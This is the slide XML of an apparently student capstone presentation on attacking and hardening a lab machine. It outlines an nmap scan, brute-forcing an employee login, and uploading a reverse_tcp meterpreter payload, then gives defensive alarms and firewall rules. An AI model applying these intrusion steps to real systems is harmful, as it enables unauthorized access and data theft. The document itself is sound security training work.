            <a:off x="449895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-Configure the company’s firewall to filter incoming port requests to verify they are generated by approved sources, and/or block port scan requests after an excessive amount of requests are made</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312" name="Google Shape;1312;p8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3" name="Google Shape;1313;p87"/>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-Generate an alarm each and every time this directory is accessed, or at least any time it is accessed by an unknown or untrusted source ip.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1314" name="Google Shape;1314;p87"/>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-Require multi factor authentication any time a user attempts to access this directory, or have this directory encrypted to where any request to access it would require approval by management and/or IT security</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320" name="Google Shape;1320;p8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1" name="Google Shape;1321;p88"/>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-Clearly there is no effective alarm in place for an excessive amount of failed login attempts due to the high amount of requests made before the attack was successful. An alarm should be generated any time the number of failed login attempts exceeds a certain threshold within a short timeframe (EX: 10 failed attempts within 1 minute)</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1322" name="Google Shape;1322;p88"/>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-The IT security department should implement the alarm mentioned earlier and  lockout the account that triggered it at each and every occurrence. They should also consider implementing software that can help prevent these attacks (EX: Netacea)</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328" name="Google Shape;1328;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9" name="Google Shape;1329;p89"/>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-Generate an alarm each and every time this directory is accessed or requested access to by an unknown source, or even by an employee that should not have access privileges to this specific location</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;p89"/>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-Require verification by manager and/or IT security as well as multi-factor authentication each and every time this database is accessed.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>-Insert filters on the company firewall to only allow trusted source IPs to access this location</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336" name="Google Shape;1336;p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37" name="Google Shape;1337;p90"/>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-Generate an alarm anytime an unknown file is uploaded into this database from an untrusted source, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as well as an alert for any access to port 4444 or any other ports on the network if they are being accessed by an unknown or unapproved source IP and if a request is made to insert (POST) files into this location by an unapproved source</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1338" name="Google Shape;1338;p9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-The unknown file or source should be deleted from the system immediately upon discovery and a block should be placed on the source ip that inserted the file</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>-If possible, close off all outside traffic to port 4444 and any other ports that could be accessed; may also want to perform scheduled nmap port scans to ensure this and other ports are secure</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>-May also want to use scanning tools such as Metasploit and Nessus to check for other potential vulnerabilities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Describe the solution. If possible, provide the required command line. </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36250" y="910475"/>
            <a:ext cx="6699600" cy="3960900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14530"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">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marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Add your diagram to this slide and fill out the data in the sidebar.</a:t>
            </a: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sz="1100" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IP Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gateway: 192.168.1.1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a:t>IPv4: 192.168.1.8</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Kali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192.168.1.105</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Capstone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192.168.1.100</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ELK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Gateway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61" name="Google Shape;1061;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1107275"/>
            <a:ext cx="6772101" cy="2928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8" name="Google Shape;1068;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9" name="Google Shape;1069;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5" name="Google Shape;1075;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6" name="Google Shape;1076;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sz="1000"/>
              <a:t>Command used: nmap 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>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{A4A3F8AC-6EEE-492E-8326-5E41E2CEAFFD}</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 sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK (Kibana)</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Data Collector</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Target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192.168.1.8</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Attacker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Default Gateway</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3" name="Google Shape;1083;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{A4A3F8AC-6EEE-492E-8326-5E41E2CEAFFD}</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sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"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sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"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sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"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pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="800" i="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Use the CVE number if it exists. Otherwise, use the common name. </a:t>
                      </a:r>
                      <a:endParaRPr sz="8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800" i="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Describe the vulnerability. </a:t>
                      </a:r>
                      <a:endParaRPr sz="8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800" i="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Describe what this vulnerability allows the attacker to do.</a:t>
                      </a:r>
                      <a:endParaRPr sz="8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7375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Sensitive data exposure (OWASP Top 10-#3)</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800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The http directory pathway of the company site was modified to redirect the attacker to the secret_folder directory and provided access to a password file</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800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This vulnerability allows for sensitive, confidential data to be accessed and exposed</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pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Broken Access Control (OWASP Top 10-#5)</a:t>
                      </a:r>
                      <a:endParaRPr sz="8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800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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An employee’s login credentials were leaked via a brute force attack</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The successful attack enables an attacker to log in to the company database system posing as the compromised employee and access sensitive information and potential cause harm to the employee and/or company database</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Unauthorized File Upload </a:t>
                      </a:r>
                      <a:endParaRPr sz="8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(Critical Vulnerability)</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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Attackers are able to access the target machine via meterpreter session upload a payload file to tamper with the target machine and access sensitive data that could be copied over to the attacker machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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The payload allows an attacker to obtain command and control over the target machine, potentially resulting in further sensitive data exposure</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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Exploitation: Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;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2" name="Google Shape;1092;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Performed nmap scan on 192.168.1.0/24, revealing IP of Target VM</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Navigated to Target IP website using Mozilla Firefox browser</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">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Uncovered ‘secret_folder’ directory from error messages while exploring website</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Attempts to access this directory subsequently revealed the username of an employee, ‘ashton’</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Navigated to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_folders/secret_folder</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Login prompt popped up with text saying “For ashton’s eyes only”</a:t>
            </a:r>
            <a:endParaRPr sz="12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Secret_folder directory revealed in error</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250175" y="578650"/>
            <a:ext cx="5382800" cy="45170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1774</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>190</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Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System James Swift</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Secret_folder directory revealed in error</vt:lpstr>
      <vt:lpstr>Attempt to navigate to secret_folder directory</vt:lpstr>
      <vt:lpstr>Exploitation: Broken Access Control</vt:lpstr>
      <vt:lpstr>Brute Force attack initiated on ashton’s account</vt:lpstr>
      <vt:lpstr>Successful result of BF attack revealing ashton’s password</vt:lpstr>
      <vt:lpstr>Used ashton’s login to login to secret folder directory</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploitation: Unauthorized File Upload</vt:lpstr>
      <vt:lpstr>Uploaded the reverse_tcp payload to the target machine</vt:lpstr>
      <vt:lpstr>Created a reverse_tcp shell payload using msf_exploit</vt:lpstr>
      <vt:lpstr>Successfully established meterpreter session with target machine</vt:lpstr>
      <vt:lpstr>This meterpreter session enabled me to navigate up to the root directory and browse all files and directories within the system, leading me to the target ‘flag’ file</vt:lpstr>
      <vt:lpstr>Flag file exposed</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</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 James Swift</dc:title>
  <dc:creator>James Swift</dc:creator>
  <cp:lastModifiedBy>James Swift</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-22T16:17:58Z</dcterms:modified>
</cp:coreProperties>
</file>